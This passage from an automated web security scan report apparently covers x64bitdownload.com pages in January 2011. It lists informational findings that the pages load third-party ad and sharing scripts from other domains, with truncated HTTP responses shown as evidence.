Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.106. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.107. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.108. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.109. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.110. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.111. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.112. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.113. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.114. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.115. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.116. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.117. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:47 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.118. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.119. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.120. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.121. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.122. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
